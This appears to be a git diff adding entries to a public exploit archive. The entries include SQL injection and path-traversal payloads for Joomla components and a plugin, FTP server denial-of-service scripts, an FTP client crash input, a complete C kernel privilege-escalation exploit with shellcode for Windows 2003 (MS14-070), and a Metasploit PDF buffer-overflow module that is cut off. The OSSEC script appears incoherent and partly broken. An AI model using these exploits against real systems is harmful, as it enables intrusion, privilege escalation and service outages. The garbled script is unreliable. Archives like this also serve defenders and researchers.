+  filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1
+
+-------------------------------------------------------------------------------------------
+
+##2 Insecure File Upload
+
+  Default JEM settings allows to upload HTML/HTM files as event's attachment.
+  An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript).
+  These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.
+
+  Attachments process is handled by "/site/classes/attachments.class.php" file.
+  File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file.
+
+-------------------------------------------------------------------------------------------
+
+# NOTES
+
+  08-01-2015: Vendor notification.
+  08-12-2015: Vendor fixes the issues in the development branch.
+
+  The author is not responsible for the misuse of the information provided in this security advisory.
diff --git a/platforms/php/webapps/37728.py b/platforms/php/webapps/37728.py
new file mode 100755
index 000000000..d9b2898a9
--- /dev/null
+++ b/platforms/php/webapps/37728.py
@@ -0,0 +1,71 @@
+###########################################################
+# Exploit Title: [OSSEC]
+# Date: [2015-08-01]
+# Exploit Author: [Milad Saber]
+# Vendor Homepage: [www.ossec.net]
+# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
+# Version: [0.8]
+# Tested on: [OSSEC Manager]
+# Exploit for DOS ossec server.
+# Please install ossec server and WUI 0.8 and run this exploit
+##########################################################
+import socket
+import sys
+import time
+ 
+# specify payload
+payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
+user = 'root'
+pwd = 'var'
+ 
+if len(sys.argv) != 2:
+    sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
+    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
+    sys.exit(1)
+ 
+ip = sys.argv[1]
+ 
+def recv(s):
+        s.recv(1024)
+        time.sleep(0.2)
+ 
+try:
+    print "[+]Connecting to milad exploit ..."
+    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    s.connect((ip,4555))
+    s.recv(1024)
+    s.send(user + "\n")
+    s.recv(1024)
+    s.send(pwd + "\n")
+    s.recv(1024)
+    print "[+]Creating user..."
+    s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
+    s.recv(1024)
+    s.send("quit\n")
+    s.close()
+ 
+    print "[+]Connecting to SMTP server..."
+    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    s.connect((ip,25,80))
+    s.send("hello milad@milad.pl\r\n")
+    recv(s)
+    print "[+]Sending payload..."
+    s.send("mail from: <'@milad.pl>\r\n")
+    recv(s)
+    # also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
+    s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
+    recv(s)
+    s.send("data\r\n")
+    recv(s)
+    s.send("From: milad@milad.pl\r\n")
+    s.send("\r\n")
+    s.send("'\n")
+    s.send(payload + "\n")
+    s.send("\r\n.\r\n")
+    recv(s)
+    s.send("quit\r\n")
+    recv(s)
+    s.close()
+    print "[+]Done! Payload will be executed once somebody logs in."
+except:
+    print "Connection failed."
\ No newline at end of file
diff --git a/platforms/php/webapps/37769.txt b/platforms/php/webapps/37769.txt
new file mode 100755
index 000000000..0c40d6ab0
--- /dev/null
+++ b/platforms/php/webapps/37769.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Gkplugins Picasaweb Download File
+# Date : 2015-08-13
+# Exploit Author : TMT [VNhgroup]
+# Vendor Homepage: https://gkplugins.com/
+# Tested on: Windows 7
+
+File
+------------------------
+$fileout = $_GET['f']; <--  can you download file
+$filelength = $_GET['l'];
+$filestream = $_GET['start'];
+if($fileout!=""){
+	$fileout = urldecode($fileout);
+	$filelength = urldecode($filelength);
+	if($filestream!=""){
+		$filelength -= $filestream;
+		$filestream = "?start=".$filestream;
+	}
+	header('Content-Type: application/octet-stream');
+	header('Content-Length: ' . $filelength);
+	readfile($fileout.$filestream);
+}else{
+	$text = get_curl($link); 
+	echo $text;
+}
+
+------------------------------
+Exploit Code:
+site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php
+
diff --git a/platforms/php/webapps/37773.txt b/platforms/php/webapps/37773.txt
new file mode 100755
index 000000000..1b34b3aef
--- /dev/null
+++ b/platforms/php/webapps/37773.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Joomla com_memorix component SQL Injection vulnerability
+# Date: 13-08-2015
+# Software Link: N/A
+# Exploit Author: Omar AbuHassan
+# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
+# CVE: N/A
+# Category: webapps
+# Version: All
+# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
+ 
+1. Description
+   
+Normal user can inject sql query in the url which lead to read data from the database.
+ 
+2. Proof of Concept
+
+http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI)
+
+Injected column is # 3
+
+http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan
+
+** No solution yet from vendor **
+
+#######################
+# Greets to Palestine #
+#######################
\ No newline at end of file
diff --git a/platforms/php/webapps/37774.txt b/platforms/php/webapps/37774.txt
new file mode 100755
index 000000000..ca8fe49ac
--- /dev/null
+++ b/platforms/php/webapps/37774.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Joomla com_informations component SQL Injection vulnerability
+# Date: 13-08-2015
+# Software Link: N/A
+# Exploit Author: Omar AbuHassan
+# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
+# CVE: N/A
+# Category: webapps
+# Version: All
+# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
+ 
+1. Description
+   
+Normal user can inject sql query in the url which lead to read data from the database.
+ 
+2. Proof of Concept
+
+http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
+
+Injected column is # 3
+
+http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
+
+** No solution yet from vendor **
+
+#######################
+# Greets to Palestine #
+#######################
\ No newline at end of file
diff --git a/platforms/windows/dos/37763.txt b/platforms/windows/dos/37763.txt
new file mode 100755
index 000000000..7716d86e0
--- /dev/null
+++ b/platforms/windows/dos/37763.txt
@@ -0,0 +1,30 @@
+********************************************************************************************
+# Exploit Title: NetServe FTP Client 1.0 DOS (Overflow).
+# Date: 8/12/2015
+# Exploit Author: Un_N0n
+# Software Link:  http://netserve-ftp-client.en.softonic.com/
+# Version: Version 1.0.0 
+# Tested on: Windows 7 x64(64 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- Open up NetServeFTPClient.exe
+2- Click on 'Site List'.
+3- Select any Directory and Click on NEW.
+4- In the Fields like NAME, FTP_PATH, Username, Password Paste in the Junk Produced by PY script given Below.
+Program will crash saying 'Run Time Error (6), Overflow'.
+
+[Reason?]
+Acc to MSDN:"An overflow results when you try to make an assignment that exceeds the limitations of the target of the assignment."
+REF for More Info: https://msdn.microsoft.com/en-us/library/aa264525(v=vs.60).aspx
+
+
+[Code to produce evil bleh.txt ;)]: 
+data = "\x41" * 8000
+file = open("bleh.txt","w")
+file.write(data)
+file.close()
+
+[Link for Software: ]
+http://netserve-ftp-client.esoftfinder.com/download/
+**********************************************************************************************************************************************
\ No newline at end of file
diff --git a/platforms/windows/dos/37775.py b/platforms/windows/dos/37775.py
new file mode 100755
index 000000000..8163e847b
--- /dev/null
+++ b/platforms/windows/dos/37775.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos
+# Date: 2015-08-15
+# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
+# Twitter: st0rnpentest
+#
+# Vendor Homepage: www.codecrafters.com
+# Software Link: http://www.codecrafters.com/AbilityFTPServer
+# Version: 2.1.4
+# Tested on: Windows 7
+#
+
+import socket
+import sys
+import os
+
+
+def clear():
+ os.system("cls")
+
+def banner():
+ print "############################################".center(80)
+ print "#        Ability FTP Server DoS PoC        #".center(80)
+ print "#             Author: St0rn                #".center(80)
+ print "#      <fabien[at]anbu-pentest[dot]com>    #".center(80)
+ print "############################################".center(80)
+   
+def createconn(ip):
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ try:
+  s.connect((ip,21))
+ except:
+  print "\n"
+  print "[+] Server Down!".center(80)
+  sys.exit(0)
+ return s
+
+def crash(sock):
+ try:
+  while 1:
+   sock.send('USER '+'a'*99999)
+   sys.stdout.write('.')
+ except:
+  sock.close()
+
+############### Main ###############
+clear()
+banner()
+
+if len(sys.argv)==2:
+ print "\n"
+ print "Waiting 2 or 3 minutes before crash".center(80)
+ print "(The server can be run without afsloader.exe)".center(80)
+ while 1:
+  s=createconn(sys.argv[1])
+  crash(s)
+else:
+ print "\n"
+ print "Usage: AftpDos.py [Server IP]".center(80)
+ sys.exit(0)
\ No newline at end of file
diff --git a/platforms/windows/dos/37776.py b/platforms/windows/dos/37776.py
new file mode 100755
index 000000000..a87aff904
--- /dev/null
+++ b/platforms/windows/dos/37776.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos
+# Date: 2015-08-15
+# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
+# Twitter: st0rnpentest
+#
+# Vendor Homepage: www.codecrafters.com
+# Software Link: http://www.codecrafters.com/AbilityFTPServer
+# Version: 2.1.4
+# Tested on: Windows 7
+#
+
+import socket
+import sys
+import os
+
+
+def clear():
+ os.system("cls")
+
+def banner():
+ print "############################################".center(80)
+ print "#  Ability FTP Server Admin panel DoS       #".center(80)
+ print "#             Author: St0rn                #".center(80)
+ print "#      <fabien[at]anbu-pentest[dot]com>    #".center(80)
+ print "############################################".center(80)
+   
+def createconn(ip):
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ try:
+  s.connect((ip,7200))
+ except:
+  print "\n"
+  print "[+] Server Down!".center(80)
+  sys.exit(0)
+ return s
+
+def crash(sock):
+ try:
+  while 1:
+   sock.send('authcode '+'a'*99999)
+   sys.stdout.write('.')
+ except:
+  sock.close()
+
+############### Main ###############
+clear()
+banner()
+
+if len(sys.argv)==2:
+ print "\n"
+ print "Waiting before crash".center(80)
+ print "(The server can be run without afsloader.exe)".center(80)
+ while 1:
+  s=createconn(sys.argv[1])
+  crash(s)
+else:
+ print "\n"
+ print "Usage: AftpAdminDos.py [Server IP]".center(80)
+ sys.exit(0)
\ No newline at end of file
diff --git a/platforms/windows/local/37755.c b/platforms/windows/local/37755.c
new file mode 100755
index 000000000..0016c4f40
--- /dev/null
+++ b/platforms/windows/local/37755.c
@@ -0,0 +1,423 @@
+/*
+################################################################
+# Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070)
+# Date: 2015-08-10
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software:
+#   Windows 2003 SP2 x86
+#   Windows 2003 SP2 x86-64
+#   Windows 2003 SP2 IA-64
+# Supported vulnerable software:
+#   Windows 2003 SP2 x86
+# Tested on:
+#   Windows 2003 SP2 x86 EN
+# CVE ID:   2014-4076
+# OSVDB-ID: 114532
+################################################################
+# Vulnerability description:
+#   Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to
+#   properly handle objects in memory during IOCTL processing.
+#   By crafting an input buffer that will be passed to the TCP
+#   device through the DeviceIoControlFile() function, it is
+#   possible to trigger a vulnerability that would allow an
+#   attacker to elevate privileges.
+#   An attacker who successfully exploited this vulnerability
+#   could run arbitrary code in kernel mode (i.e. with SYSTEM
+#   privileges).
+################################################################
+# Exploit notes:
+#   Privileged shell execution:
+#     - the SYSTEM shell will spawn within the existing shell
+#       (i.e. exploit usable via a remote shell)
+#       - upon exiting the SYSTEM shell, the parent process
+#         will become unresponsive/hang
+#   Exploit compiling:
+#     - # i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe
+#   Exploit prerequisites:
+#     - low privilege access to the target (remote shell or RDP)
+#     - target not patched (KB2989935 not installed)
+################################################################
+# Patch:
+#   https://www.microsoft.com/en-us/download/details.aspx?id=44646
+################################################################
+# Thanks to:
+#   KoreLogic (Python PoC)
+#   ChiChou (C++ PoC)
+################################################################
+# References:
+#   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076
+#   https://technet.microsoft.com/library/security/ms14-070
+#   https://www.exploit-db.com/exploits/35936/
+#   https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp
+#   https://www.osronline.com/article.cfm?article=229
+################################################################
+*/
+
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+
+
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+        SystemBasicInformation                = 0,
+        SystemPerformanceInformation          = 2,
+        SystemTimeOfDayInformation            = 3,
+        SystemProcessInformation              = 5,
+        SystemProcessorPerformanceInformation = 8,
+        SystemInterruptInformation            = 23,
+        SystemExceptionInformation            = 33,
+        SystemRegistryQuotaInformation        = 37,
+        SystemLookasideInformation            = 45
+} SYSTEM_INFORMATION_CLASS;
+
+
+typedef DWORD NTSTATUS;
+NTSTATUS WINAPI NtQuerySystemInformation (
+        SYSTEM_INFORMATION_CLASS   SystemInformationClass,
+        PVOID                      SystemInformation,
+        ULONG                      SystemInformationLength,
+        PULONG                     ReturnLength
+);
+
+
+typedef struct _IO_STATUS_BLOCK {
+        union {
+                NTSTATUS           Status;
+                PVOID              Pointer;
+        };
+        ULONG_PTR                  Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG);
+
+
+NTSTATUS (WINAPI *ZwAllocateVirtualMemory) (
+        HANDLE                     ProcessHandle,
+        PVOID                      *BaseAddress,
+        ULONG_PTR                  ZeroBits,
+        PSIZE_T                    RegionSize,
+        ULONG                      AllocationType,
+        ULONG                      Protect
+);
+
+
+NTSTATUS (WINAPI *ZwDeviceIoControlFile) (
+        HANDLE                     FileHandle,
+        PVOID                      ApcContext,
+        PIO_STATUS_BLOCK           IoStatusBlock,
+        ULONG                      IoControlCode,
+        PVOID                      InputBuffer,
+        ULONG                      InputBufferLength,
+        PVOID                      OutputBuffer,
+        ULONG                      OutputBufferLength
+);
+
+
+
+
+BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
+{
+        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
+        startupInformation->cb = sizeof (STARTUPINFO);
+        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
+
+        // Start the child process.
+        return CreateProcess (
+                NULL,                                                           // No module name (use command line)
+                "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
+                NULL,                                                           // Process handle not inheritable
+                NULL,                                                           // Thread handle not inheritable
+                TRUE,                                                           // Set handle inheritance to TRUE
+                0,                                                              // No creation flags
+                NULL,                                                           // Use parent's environment block
+                NULL,                                                           // Use parent's starting directory
+                &startupInformation[0],                                         // Pointer to STARTUPINFO structure
+                &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
+        );
+}
+
+
+
+
+unsigned long SwapBytes (unsigned long inputByteUL)
+{
+        return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) +
+        ((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24));
+}
+
+
+
+
+BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
+{
+        int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5;
+
+        returnAllocMemValue1 = WriteProcessMemory (
+                (HANDLE) 0xFFFFFFFF,
+                (LPVOID) 0x28,
+                "\x87\xff\xff\x38",
+                4,
+                NULL
+        );
+        returnAllocMemValue2 = WriteProcessMemory (
+                (HANDLE) 0xFFFFFFFF,
+                (LPVOID) 0x38,
+                "\x00\x00",
+                2,
+                NULL
+        );
+        returnAllocMemValue3 = WriteProcessMemory (
+                (HANDLE) 0xFFFFFFFF,
+                (LPVOID) 0x1100,
+                &exploitBuffer[0],
+                32,
+                NULL
+        );
+        returnAllocMemValue4 = WriteProcessMemory (
+                (HANDLE) 0xFFFFFFFF,
+                (LPVOID) 0x2b,
+                "\x00\x00",
+                2,
+                NULL
+        );
+        returnAllocMemValue5 = WriteProcessMemory (
+                (HANDLE) 0xFFFFFFFF,
+                (LPVOID) 0x2000,
+                &shellcode[0],
+                96,
+                NULL
+        );
+
+        if (returnAllocMemValue1 == 0 ||
+        returnAllocMemValue2 == 0 ||
+        returnAllocMemValue3 == 0 ||
+        returnAllocMemValue4 == 0 ||
+        returnAllocMemValue5 == 0)
+                return FALSE;
+        else
+                return TRUE;
+}
+
+
+
+
+int main (void)
+{
+        fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
+        fprintf (stderr, "    [*] by Tomislav Paskalev\n");
+        fflush (stderr);
+
+
+        ////////////////////////////////
+        // CREATE NEW CME.EXE PROCESS
+        ////////////////////////////////
+
+        STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO));
+        PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION));
+
+        if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
+        {
+                fprintf (stderr, "[-] Creating a new process failed\n");
+                fprintf (stderr, "    [*] Error code   : %d\n", GetLastError());
+                fflush (stderr);
+                ExitProcess (1);
+        }
+
+        fprintf (stderr, "[+] Created a new cmd.exe process\n");
+        fflush (stderr);
+
+
+        ////////////////////////////////
+        // CONVERT PID TO HEX LE
+        ////////////////////////////////
+
+        unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, "    [*] PID [dec]    :   %#8lu\n", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, "    [*] PID [hex]    : %#010x\n", (unsigned long) processInformation->dwProcessId);
+        fprintf (stderr, "    [*] PID [hex LE] : %#010x\n", pidLittleEndian);
+
+        /*four bytes of hex = 8 characters, plus NULL terminator*/
+        unsigned char pidLittleEndianString[9];
+
+        sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);
+
+
+        ////////////////////////////////
+        // CREATE SHELLCODE
+        ////////////////////////////////
+
+        unsigned char exploitBuffer[] =
+        "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
+        "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
+        unsigned char shellcode[] =
+        "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
+        "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
+        "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
+        "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
+        "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
+        "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
+
+        int counter;
+        for (counter = 0; counter < 4; counter++)
+        {
+                char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0};
+                shellcode[46 + counter] = strtol (buffer, NULL, 16);
+        }
+
+        shellcode[77] = strtol ("39", NULL, 16);
+        shellcode[78] = strtol ("ff", NULL, 16);
+        shellcode[79] = strtol ("a2", NULL, 16);
+        shellcode[80] = strtol ("ba", NULL, 16);
+
+        shellcode[82] = strtol ("0", NULL, 16);
+        shellcode[83] = strtol ("0", NULL, 16);
+        shellcode[84] = strtol ("0", NULL, 16);
+        shellcode[85] = strtol ("0", NULL, 16);
+
+        fprintf (stderr, "[+] Modified shellcode\n");
+        fflush (stderr);
+
+
+        ////////////////////////////////
+        // CREATE HANDLE ON TCPIP.SYS
+        ////////////////////////////////
+
+        HANDLE tcpIPDeviceHandle = CreateFileA (
+                "\\\\.\\Tcp",
+                0,
+                0,
+                NULL,
+                OPEN_EXISTING,
+                0,
+                NULL
+        );
+
+        if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
+        {
+                printf ("[-] Opening TCP/IP I/O dev failed\n");
+                printf ("    [*] Error code   : %d\n", GetLastError());
+                ExitProcess (1);
+        }
+
+        fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
+        fflush (stderr);
+
+
+        ////////////////////////////////
+        // ALLOCATE MEMORY - FIRST PAGE
+        ////////////////////////////////
+
+        FARPROC ZwAllocateVirtualMemory;
+
+        ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
+
+        fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
+        fflush (stderr);
+
+        NTSTATUS AllocMemReturnCode;
+        ULONG BaseAddress = 0x1000, RegionSize = 0x4000;
+
+        AllocMemReturnCode = ZwAllocateVirtualMemory (
+                (HANDLE) 0xFFFFFFFF,
+                &BaseAddress,
+                0,
+                &RegionSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_EXECUTE_READWRITE
+        );
+
+        if (AllocMemReturnCode != 0)
+        {
+                printf ("[-] Allocating memory failed\n");
+                printf ("    [*] Error code   : %#X\n", AllocMemReturnCode);
+                ExitProcess (1);
+        }
+
+        fprintf (stderr, "[+] Allocated memory\n");
+        fprintf (stderr, "    [*] BaseAddress  : 0x%p\n", BaseAddress);
+        fprintf (stderr, "    [*] RegionSize   : %#010x\n", RegionSize);
+        fflush (stderr);
+
+
+        ////////////////////////////////
+        // WRITE EXPLOIT TO PROCESS MEM
+        ////////////////////////////////
+
+        fprintf (stderr, "[*] Writing exploit...\n");
+        fflush (stderr);
+
+        if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
+        {
+                fprintf (stderr, "    [-] Failed to write to memory\n");
+                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
+                fflush (stderr);
+                ExitProcess (1);
+        }
+        else
+        {
+                fprintf (stderr, "    [+] done\n");
+                fflush (stderr);
+        }
+
+
+        ////////////////////////////////
+        // SEND EXPLOIT TO TCPIP.SYS
+        ////////////////////////////////
+
+        fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
+        fprintf (stderr, "    [*] Parent proc hangs on exit\n");
+        fflush (stderr);
+
+        FARPROC ZwDeviceIoControlFile;
+        NTSTATUS DevIoCtrlReturnCode;
+        ULONG ioStatus = 8;
+
+        ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
+
+        DevIoCtrlReturnCode = ZwDeviceIoControlFile (
+                tcpIPDeviceHandle,
+                NULL,
+                NULL,
+                NULL,
+                (PIO_STATUS_BLOCK) &ioStatus,
+                0x00120028,                                //Device: NETWORK (0x12)
+                                                        //Function: 0xa
+                                                        //Access: FILE_ANY_ACCESS
+                                                        //Method: METHOD_BUFFERED
+                (PVOID) 0x1100,                                //NULL,                //Test
+                32,                                        //0,                //Test
+                NULL,
+                0
+        );
+
+        if (DevIoCtrlReturnCode != 0)
+        {
+                fprintf (stderr, "    [-] Exploit failed (->TCP/IP)\n");
+                fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
+                fflush (stderr);
+                ExitProcess (1);
+        }
+
+
+        ////////////////////////////////
+        // WAIT FOR CHILD PROCESS; EXIT
+        ////////////////////////////////
+
+        // Wait until child process exits.
+        WaitForSingleObject (processInformation->hProcess, INFINITE);
+
+        fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
+        fflush (stderr);
+
+        // Close process and thread handles.
+        CloseHandle (tcpIPDeviceHandle);
+        CloseHandle (processInformation->hProcess);
+        CloseHandle (processInformation->hThread);
+
+        return 1;
+}
diff --git a/platforms/windows/local/37760.rb b/platforms/windows/local/37760.rb
new file mode 100755
index 000000000..925d976e9
--- /dev/null
+++ b/platforms/windows/local/37760.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metabuffer: http://metabuffer.com/download
+# Current source: https://github.com/rapid7/metabuffer-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  #Rank definition: http://dev.metabuffer.com/redmine/projects/framework/wiki/Exploit_Ranking
+  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::PDF
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'PDF Shaper Buffer Overflow',
+      'Description'  => %q{
+            PDF Shaper is prone to a security vulnerability when processing PDF files. 
+            The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file.
+	    This module has been tested successfully on Win Xp, Win 7, Win 8, Win 10.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom<metacom27[at]gmail.com>',  # Original discovery
+          'metacom',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '<insert OSVDB number here>' ],
+          [ 'CVE', 'insert CVE number here' ],
+          [ 'URL', '<insert another link to the exploit/advisory here>' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process', #none/process/thread/seh
+          #'InitialAutoRunScript' => 'migrate -f',
+        },
+      'Platform'  => 'win',
+      'Payload'  => 
+        {
+          'Space'       => 2000,
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ '<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5>',
+            {
+              'Ret'     =>  0x00713726, # pop ebx # pop ebp # ret  - PDFTools.exe
+              'Offset'  =>  433
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      #Correct Date Format: "M D Y"
+      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
+      'DisclosureDate'  => 'Aug 10 2015',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),], self.class)
+
+  end
+
+  def exploit
+	file_create(make_pdf)
+  end	 	
+	
+  def jpeg
+    buffer =  "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
+    buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
+    buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
+    buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
+    buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
+    buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
+    buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
+    buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
+    buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
+    buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
+    buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
+    buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
+    buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
+    buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
+    buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
+    buffer << rand_text(target['Offset'])  #junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded
+    buffer << rand_text(2388 - payload.encoded.length) 
+    return buffer
+
+  end
+  
+
+  def nObfu(str)
+    return str
+  end
+
+  def make_pdf
+    # pdf template taken from PDF Shaper exploit module
+    @pdf << header
+    add_object(1, nObfu("<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>"))
+    add_object(2, nObfu("<</Type/Outlines>>"))
+    add_object(3, nObfu("<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>"))
+    add_object(4, nObfu("[/PDF/Text/ImageC]"))
+    add_object(5, nObfu("<</Type/Page/Parent 3 0 R/Contents 6 0 R>>"))
+    stream_1 = "stream" << eol
